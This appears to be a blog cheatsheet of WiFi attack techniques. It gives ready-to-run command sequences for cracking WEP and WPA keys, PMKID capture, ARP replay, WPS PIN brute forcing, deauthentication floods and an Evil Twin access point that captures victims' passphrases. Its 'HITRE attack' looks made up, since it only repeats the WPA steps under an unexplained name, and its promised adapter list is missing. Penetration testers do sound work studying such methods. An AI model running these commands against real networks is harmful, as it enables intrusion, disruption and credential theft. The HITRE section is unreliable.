Welcome to the ultimate WiFi penetration testing cheatsheet, an essential resource for every ethical hacker. This guide will walk you through the process of testing WEP, WPA, PMKID Attack, ARP Request Replay Attack, WPS PIN, HITRE attack, and the Evil Twin method. We’ll also introduce popular automated tools and provide useful links for further learning.
This cheatsheet was created with the assumption that the user has installed the Kali operating system and is competent in using Linux based tools. You will also need a wifi adapter capable of packet injection.
Here are some common network adapters that are capable of packet injection:
It’s worth noting that compatibility can vary depending on the operating system and driver support. Additionally, this list is not exhaustive, and there may be other network adapters that support packet injection as well.
Table of Contents:
- WiFi Penetration Testing Overview
- Essential Tools for WiFi Penetration Testing
- WiFi Penetration Testing Cheat sheet: Step-by-Step Guide for WEP, WPA, PMKID, ARP Request Replay, WPS PIN, HITRE, and Evil Twin Attacks
WiFi penetration testing is a critical component of network security, aiming to identify vulnerabilities in wireless networks and implement appropriate security measures. Our WiFi penetration testing cheatsheet covers various techniques and methodologies targeting WEP, WPA, WPA2, and WPA3 encryption standards.
- Essential Tools for WiFi Penetration Testing
Here are some popular automated tools for WiFi penetration testing that will be invaluable for your WiFi penetration testing cheatsheet:
- Aircrack-ng Suite: https://www.aircrack-ng.org/
- Wireshark: https://www.wireshark.org/
- Reaver: https://github.com/t6x/reaver-wps-fork-t6x
- Wifite: https://github.com/derv82/wifite2
- Fluxion: https://github.com/FluxionNetwork/fluxion
- Fern WiFi Cracker: https://github.com/savio-code/fern-wifi-cracker
- WiFi Penetration Testing Cheatsheet: Step-by-Step Guide for WEP, WPA, PMKID, ARP Request Replay, WPS PIN, HITRE, and Evil Twin Attacks
3.1 WEP Penetration Testing
- Enable monitor mode:
airmon-ng start wlan0
- Capture packets:
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
- Crack the WEP key:
aircrack-ng [OUTPUT.cap]
3.2 WPA Penetration Testing
- Enable monitor mode:
airmon-ng start wlan0
- Capture WPA handshake:
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
- Deauthenticate client:
aireplay-ng --deauth 5 -a [BSSID] -c [CLIENT] wlan0mon
- Crack WPA key:
aircrack-ng [OUTPUT.cap] -w [WORDLIST]
3.3 PMKID Attack
- Enable monitor mode:
airmon-ng start wlan0
- Capture PMKID:
hcxdumptool -i wlan0mon --enable_status 3 --filterlist=[TARGETS] --filtermode=2 --outfile=[OUTPUT]
- Convert to hashcat format:
hcxpcaptool -z [HASHFILE] [OUTPUT]
- Crack PMKID:
hashcat -m 16800 [HASHFILE] [WORDLIST] --force
3.4 ARP Request Replay Attack
- Enable monitor mode:
airmon-ng start wlan0
- Capture packets:
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
- Perform ARP request replay:
aireplay-ng --arpreplay -b [BSSID] -h [CLIENT] wlan0mon
- Crack the WEP key:
aircrack-ng [OUTPUT.cap]
3.5 WPS PIN Attack
- Enable monitor mode:
airmon-ng start wlan0
- Scan for WPS-enabled networks:
wash -i wlan0mon
- Crack WPS PIN using Reaver:
reaver -i wlan0mon -b [BSSID] -c [CHANNEL] -vv -K 1
- Obtain WPA passphrase from cracked PIN.
3.6 HITRE Attack (Handshake, Interactive, and Timing Resource Exhaustion)
- Enable monitor mode:
airmon-ng start wlan0
- Capture WPA handshake:
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
- Repeatedly deauthenticate clients:
aireplay-ng --deauth [COUNT] -a [BSSID] wlan0mon
- Crack WPA key:
aircrack-ng [OUTPUT.cap] -w [WORDLIST]
3.7 Evil Twin Attack
- Install Fluxion:
git clone https://github.com/FluxionNetwork/fluxion
- Run Fluxion:
cd fluxion && ./fluxion.sh
- Select language and follow the on-screen instructions.
- Choose “Evil Twin AP” attack and configure the fake access point.
- Capture the WPA passphrase when the victim connects to the fake access point.
Conclusion:
This WiFi penetration testing cheatsheet offers a thorough overview of WiFi penetration testing techniques, automated tools, and a step-by-step guide for WEP, WPA, PMKID, ARP Request Replay, WPS PIN, HITRE, and Evil Twin attacks. Remember to use this information responsibly and ethically, and never engage in unauthorised hacking activities.
4 comments
Comments are closed.
Add Comment